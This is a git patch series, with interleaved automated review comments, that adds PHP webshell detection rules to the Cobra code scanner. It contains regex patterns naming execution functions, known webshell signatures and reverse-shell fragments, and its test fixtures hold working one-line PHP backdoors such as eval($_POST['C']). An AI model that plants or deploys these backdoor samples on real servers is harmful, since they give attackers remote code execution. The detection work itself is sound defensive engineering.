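Review bot: The regex fires on every `->connect('host', port)` call, including the `assert="true"` sample in this hunk, which calls `$redis->auth('passwd123!#')` two lines later — so the rule reports authenticated use as 匿名访问 and the test enshrines that false positive. A single-line regex cannot see whether `auth()` follows, and the pattern is not Redis-specific either: any `->connect(` with a dotted literal host (mysqli, Memcached, a socket wrapper) matches. I would rename the rule to what it actually detects, e.g. `<name value="Redis连接点(需人工确认是否鉴权)"/>`, state in 安全风险 that a hit means "confirm `requirepass`/ACL is configured and `auth()` is called", and make the 修复方案 concrete: `在 redis.conf 中设置 requirepass(或 Redis 6+ ACL),在 connect() 之后立即调用 auth(),并将 Redis 绑定到内网地址`.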
@@ -1,54 +1,24 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="WebShell"/> + <name value="webshell1"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - (\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*)| - ((?<!->)\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| - (\$\s*(\w+)\s*=[\s\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}(?<!\>)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)))| - ((preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| - (\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1))| - 
((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\s]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))))| - (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}(?<!\\>)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\))| - (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\))| - (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}(?<!\\>)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| - 
(\$(\w*)\s*=\s*\bcreate_function\b\s*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\))| - (\$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}))| - (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}(?<![:>\s])\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| - (sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\()| - (\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| - 
(\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1) - (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1)| - (array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| - (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input)| - (^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php)| - (\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);)| - (\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\))| - (ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)))| - 
(\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| - (eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| - (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| - (preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| - (ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\))| - (\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C)| - (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| - (\$(\w+)[\s]*\\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\\]\s*\)) - + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) ]]></match> <level value="7"/> <solution> ## 安全风险 + 10101 代码中存在webShell + ## 修复方案 + </solution> <test> <case assert="true"><![CDATA[ - ]]></case> - <case assert="false"><![CDATA[ + <?php + eval($_POST['C']); + ?> ]]></case> </test> <status value="on"/> diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml new file mode 100644 index 00000000..87eb0703 --- /dev/null +++ b/rules/CVI-360002.xml 
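Review bot: The single pattern that replaces the combined rule dropped the `(?<!->)` lookbehind the original placed before `assert`, and nothing protects the rest of the group either, so method calls such as `$pdo->exec($_POST['sql'])` now satisfy `\bexec\b` and are reported as a webshell instead of as SQL injection; restoring it is one token: `(?<!->)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+…`. The superglobal list here is `GET|POST|REQUEST|COOKIE`, while CVI-360008 and CVI-360011 in this same series also accept `SERVER`; `eval($_SERVER['HTTP_X'])` is a common header-triggered backdoor, so adding `SERVER` here keeps the rules consistent. The `<case assert="false">` was removed from `<test>` in this hunk; a negative such as `$pdo->exec($_POST['sql']);` is what would pin the lookbehind.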
@@ -0,0 +1,23 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell2"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 10102 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + <case assert="false"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml new file mode 100644 index 00000000..0fadffe0 --- /dev/null +++ b/rules/CVI-360003.xml @@ -0,0 +1,23 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell3"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 10103 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + <case assert="false"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml new file mode 100644 index 00000000..05992030 --- /dev/null +++ b/rules/CVI-360007.xml 
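Review bot: The wrapper alternation `(http|https|file|php|data|ftp)\://` misses the stream wrappers real PHP backdoors lean on — `phar://` (object injection via include), `expect://` (command execution), `zip://`, `compress.zlib://`, `glob://` — so `include('phar://upload/a.jpg/x.php')` is not caught by this rule. I would widen it to `((http|https|file|php|data|ftp|phar|expect|zip|compress\.zlib|glob)\://.{0,25})`. Both `<case>` bodies in this hunk are empty CDATA; besides the positive sample added in the next patch, a `<case assert="false">` such as `include("lib/helper.php");` is what guards the rule against flagging ordinary includes.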
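Review bot: The assignment half of the pattern, `=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});`, only accepts the superglobal directly after `=`, so `$a = base64_decode($_POST['x']); eval($a);` is missed even though the same decoder is accepted at the `eval(` side; allowing an optional decoder at assignment time, `=[\s\(\{]*((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*)?(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25});`, closes that and keeps `\1` pointing at the variable name. Adding `SERVER` matches the sibling rules CVI-360008/360011. Both `<case>` bodies are empty CDATA in this hunk, so nothing verifies the backreference logic until a sample is added.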
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell7"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + 10107 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php new file mode 100644 index 00000000..4f2cf590 --- /dev/null +++ b/tests/vulnerabilities/webshell.php @@ -0,0 +1,18 @@ +<?php +//cvi-360001 +eval($_POST['C']); + +//cvi-360002 +$a="ss"; +include("sss.jpg"); + +//cvi-360003 +echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) + +//cvi-360007 +array_map("ass\x65rt",(array)$_REQUEST['expdoor']); + +//cvi-360008 + +?> + From 960715aa10d3df6c1bba544cab79eae8d0cb1027 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 17:25:14 +0800 Subject: [PATCH 09/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 17 ++++++----------- rules/CVI-360002.xml | 15 ++++++++------- rules/CVI-360003.xml | 14 ++++++-------- rules/CVI-360007.xml | 10 +++++----- 4 files changed, 25 insertions(+), 31 deletions(-) diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index 5ca863e1..0fb57ad6 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml 
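Review bot: The quoted-callback branch accepts a literal name or a `\x` escape, but a callback produced by a decoder — `call_user_func(base64_decode('YXNzZXJ0'), $_POST['x'])`, `array_map(str_rot13('nffreg'), …)` — is not covered, although CVI-360009 in this series accepts `(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}` in the same callback position. Add the same alternative here: `…|pcntl_exec|[^'\"]*\\x).{0,200}|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE)\[…`. The only `<case assert="true">` is empty CDATA, so the rule ships unverified until the fixture sample is copied in.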
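Review bot: `@eval($a)` on the cvi-360003 line has no terminating `;`, so the fixture is not valid PHP and any matcher that parses the file rather than grepping it will choke there rather than on the rule under test; append it: `echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a);`. The `//cvi-360008` marker has no sample under it, so that rule is never exercised by this fixture.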
@@ -3,24 +3,19 @@ <name value="webshell1"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[eval($_POST['C']);]]></case> + </test> <solution> ## 安全风险 - 10101 代码中存在webShell - + 代码中存在webshell ## 修复方案 - + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - <?php - eval($_POST['C']); - ?> - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml index 87eb0703..430020dd 100644 --- a/rules/CVI-360002.xml +++ b/rules/CVI-360002.xml @@ -6,18 +6,19 @@ \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a="ss"; + include("sss.jpg"); + ]]></case> + </test> <solution> ## 安全风险 - 10102 + 代码中存在webshell ## 修复方案 + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - ]]></case> - <case assert="false"><![CDATA[ - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml index 0fadffe0..584f833b 100644 --- a/rules/CVI-360003.xml +++ b/rules/CVI-360003.xml 
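Review bot: `删除` is now the entire 修复方案; for a webshell hit the file is the symptom, so the guidance should also send the reader to the entry vector and to sibling backdoors. Something like `1. 确认不是业务代码后立即删除,保留副本用于取证` / `2. 排查上传、文件写入或 RCE 入口,修复后再恢复服务` / `3. 全量扫描同目录及所有可写目录,排查其他后门并轮换可能泄露的凭据` makes the finding actionable without changing the rule itself.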
@@ -3,21 +3,19 @@ <name value="webshell3"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) + \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)]]></case> + </test> <solution> ## 安全风险 - 10103 + 代码中存在webshell ## 修复方案 + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - ]]></case> - <case assert="false"><![CDATA[ - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 05992030..6dcdd6e4 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml @@ -6,16 +6,16 @@ (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) ]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[array_map("ass\x65rt",(array)$_REQUEST['expdoor']);]]></case> + </test> <solution> ## 安全风险 - 10107 + 代码中存在webshell ## 修复方案 + 删除 </solution> - <test> - <case assert="true"><![CDATA[ - ]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file 
From 4d2190925b9aca7809df124356fbc1e9d82a8215 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 21:50:57 +0800 Subject: [PATCH 10/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360004.xml | 24 ++++++++++++++++++++++++ rules/CVI-360005.xml | 20 ++++++++++++++++++++ rules/CVI-360006.xml | 21 +++++++++++++++++++++ rules/CVI-360008.xml | 22 ++++++++++++++++++++++ rules/CVI-360009.xml | 25 +++++++++++++++++++++++++ rules/CVI-360011.xml | 21 +++++++++++++++++++++ rules/CVI-360012.xml | 21 +++++++++++++++++++++ tests/vulnerabilities/webshell.php | 23 +++++++++++++++++++++++ 8 files changed, 177 insertions(+) create mode 100644 rules/CVI-360004.xml create mode 100644 rules/CVI-360005.xml create mode 100644 rules/CVI-360006.xml create mode 100644 rules/CVI-360008.xml create mode 100644 rules/CVI-360009.xml create mode 100644 rules/CVI-360011.xml create mode 100644 rules/CVI-360012.xml diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml new file mode 100644 index 00000000..f48a0676 --- /dev/null +++ b/rules/CVI-360004.xml 
